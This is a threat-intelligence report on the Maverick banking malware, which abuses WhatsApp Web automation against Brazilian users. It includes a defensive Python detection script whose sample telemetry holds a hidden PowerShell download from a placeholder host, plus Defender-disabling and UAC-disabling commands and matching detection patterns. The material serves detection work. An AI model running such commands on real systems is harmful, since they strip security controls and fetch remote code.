Maverick Malware - WhatsApp Web Hijack Targets Brazil’s Banks
Category: Threat Actors & Campaigns
Maverick, a .NET banking malware linked to the Water Saci cluster, hijacks WhatsApp Web sessions to self-propagate and steal banking credentials from Brazilian users. The reported ATT&CK mapping is T1105 (Ingress Tool Transfer), T1059 (Command and Scripting Interpreter) and T1114 (Email Collection); note that the IMAP channel described below carries command and control rather than mailbox theft, which ATT&CK classifies separately as T1071.003 (Application Layer Protocol: Mail Protocols).

The attack chain starts with a ZIP containing a Windows LNK. The LNK launches PowerShell, which downloads a loader that deploys two components: SORVEPOTEL, which handles propagation, and Maverick, which handles credential theft and browser monitoring. Targets include Brazil's largest banks and the hospitality sector. Propagation abuses existing Chrome profiles and Selenium/ChromeDriver to automate WhatsApp Web, exfiltrating contact lists and message templates and sending lures to the victim's contacts. Before delivering Maverick, the loader checks locale and time zone to confirm a Brazilian target and disables Microsoft Defender and UAC; Maverick is only dropped once these environmental checks pass. Analysts note overlaps with the Coyote family, but the cluster is still treated as a distinct threat.

Impact: with 148M+ WhatsApp users in Brazil, organizations face account takeover, large-scale credential theft, financial fraud, and reputational damage when compromised accounts spread lures to customers.

Maverick's C2 combines email-based control (terra.com[.]br mailboxes over IMAP, with MFA on the accounts) with HTTP endpoints. The mail channel gives the operators human-in-the-loop control: they can pause and resume campaigns and tailor lures without redeploying the implant.

Mitigation: enforce application control and PowerShell Constrained Language Mode, monitor for ChromeDriver/Selenium downloads and installs, block LNK execution from archives, and detect WhatsApp Web automation patterns (ChromeDriver parenting Chrome, Chrome launched with remote-debugging or explicit user-data-dir flags). Educate users on ZIP/LNK risks and alert on banking URL matches in active-tab telemetry.
CORTEX Protocol Intelligence Assessment
Business Impact: High risk of credential theft and fraud for Brazilian subsidiaries and consumers; potential brand damage from compromised WhatsApp accounts spreading malware to customers. Technical Context: LNK → PowerShell loader → SORVEPOTEL propagation via WhatsApp Web; IMAP-based C2 with MFA. ATT&CK: T1105, T1059, T1114, plus defense evasion via disabling AV/UAC.
Strategic Intelligence Guidance
- Block execution of LNK files from archives; confirm AMSI is active and enforce PowerShell Constrained Language Mode across endpoints.
- Detect ChromeDriver/Selenium installs outside developer groups; monitor WhatsApp Web automation.
- Implement bank session protection: anti-overlay, URL monitoring, and conditional access for Brazil.
- Harden browsers with policy: disallow external extensions and enforce real-time safe browsing.
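The detection items above (LNK launched from an archive, ChromeDriver/Selenium outside developer groups, Chrome driven by automation, Defender/UAC being switched off) can be expressed as simple rules over process-creation telemetry. The block below is an added example written for this page; it is not code from the campaign, the reporting vendor, or any product. The events are constructed Sysmon Event ID 1 style records, and the path and command-line indicators (the `Temp<N>_<archive>.zip` scratch directory Explorer uses when a file is opened from inside a ZIP, the `Set-MpPreference`/`EnableLUA` tampering commands, the `DEV_USERS` allow-list) are assumptions drawn from the chain as described, not confirmed indicators from the report.

```python
"""Rule-based triage of process-creation telemetry for the Maverick/SORVEPOTEL
chain. Added illustration only: not code from the campaign, the reporting
vendor, or any product. Events are constructed Sysmon Event ID 1 style
records; the indicators are assumptions, not confirmed IOCs."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str         # full path of the created process
    parent_image: str  # full path of the parent process
    cmdline: str       # command line of the created process
    cwd: str = ""      # current directory at creation
    user: str = ""     # account that ran it


# Assumption: a file opened from Explorer's compressed-folder view is first
# extracted to %TEMP%\Temp<N>_<archive>.zip\, so an LNK launched from a ZIP
# shows up as explorer.exe -> script host with that working directory.
TEMP_ZIP_DIR = re.compile(r"\\Temp\\Temp\d+_[^\\]+\.zip(?:\\|$)", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
# Assumption: typical Defender / UAC tampering commands. The page says the
# loader disables Defender and UAC but does not give the exact commands.
TAMPER_PATTERNS = [
    re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
    re.compile(r"Add-MpPreference\s+-Exclusion\w+", re.I),
    re.compile(r"EnableLUA\b.*/d\s+0\b", re.I),
]
# Constructed allow-list of accounts expected to run Selenium/ChromeDriver.
DEV_USERS = {"CORP\\dev.alice"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_lnk_from_archive(e: ProcEvent):
    """Script host spawned by Explorer out of a ZIP scratch directory."""
    if basename(e.parent_image) == "explorer.exe" and basename(e.image) in SCRIPT_HOSTS:
        if TEMP_ZIP_DIR.search(e.cwd) or TEMP_ZIP_DIR.search(e.cmdline):
            return "lnk_from_archive"
    return None


def rule_browser_automation(e: ProcEvent):
    """ChromeDriver outside the dev group, or Chrome driven by a script host."""
    img, parent = basename(e.image), basename(e.parent_image)
    if img == "chromedriver.exe" and e.user not in DEV_USERS:
        return "chromedriver_outside_dev"
    if img in {"chrome.exe", "msedge.exe"} and parent in {"chromedriver.exe", "python.exe", "powershell.exe", "node.exe"}:
        low = e.cmdline.lower()
        if "--remote-debugging-port" in low or "--user-data-dir" in low:
            return "automated_browser_session"
    return None


def rule_defense_tamper(e: ProcEvent):
    """Defender or UAC switched off from a shell or reg.exe."""
    if basename(e.image) in SCRIPT_HOSTS | {"reg.exe"}:
        if any(p.search(e.cmdline) for p in TAMPER_PATTERNS):
            return "defender_or_uac_tamper"
    return None


RULES = (rule_lnk_from_archive, rule_browser_automation, rule_defense_tamper)


def triage(events):
    """Return (event index, rule tag) for every rule that fires on each event."""
    hits = []
    for i, e in enumerate(events):
        for rule in RULES:
            tag = rule(e)
            if tag:
                hits.append((i, tag))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
# Constructed sample telemetry: a benign WhatsApp Web visit (0), the chain
# stages (1-4, 6), and a legitimate developer Selenium run (5).
SAMPLE_EVENTS = [
    ProcEvent(CHROME, r"C:\Windows\explorer.exe", "chrome.exe https://web.whatsapp.com/", r"C:\Users\maria", "CORP\\maria"),
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              'powershell.exe -NoP -W Hidden -Command "iwr https://example.invalid/l.ps1 -OutFile $env:TEMP\\l.ps1"',
              r"C:\Users\maria\AppData\Local\Temp\Temp1_NF-e_12345.zip", "CORP\\maria"),
    ProcEvent(PS, PS, "powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true", r"C:\Users\maria", "CORP\\maria"),
    ProcEvent(r"C:\Users\maria\AppData\Local\Temp\chromedriver.exe", PS, "chromedriver.exe --port=9515", r"C:\Users\maria\AppData\Local\Temp", "CORP\\maria"),
    ProcEvent(CHROME, r"C:\Users\maria\AppData\Local\Temp\chromedriver.exe",
              'chrome.exe --user-data-dir="C:\\Users\\maria\\AppData\\Local\\Google\\Chrome\\User Data" --remote-debugging-port=9222',
              r"C:\Users\maria", "CORP\\maria"),
    ProcEvent(r"C:\tools\selenium\chromedriver.exe", r"C:\Python312\python.exe", "chromedriver.exe --port=9515", r"C:\src\tests", "CORP\\dev.alice"),
    ProcEvent(r"C:\Windows\System32\reg.exe", r"C:\Windows\System32\cmd.exe",
              "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f",
              r"C:\Users\maria", "CORP\\maria"),
]

if __name__ == "__main__":
    for idx, tag in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {tag}  <- {basename(SAMPLE_EVENTS[idx].image)}")
```

The rules are deliberately narrow so that a normal user opening web.whatsapp.com in Chrome (event 0) and a developer running Selenium from Python (event 5) produce no alerts, while each stage of the chain fires exactly one rule. In production the same logic maps directly onto Sigma or EDR query language; the `DEV_USERS` set would be replaced by group membership, and the Temp-directory pattern should be widened to cover the scratch paths of third-party archivers.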
Intelligence Source: Maverick Malware - WhatsApp Web Hijack Targets Brazil’s Banks | Nov 12, 2025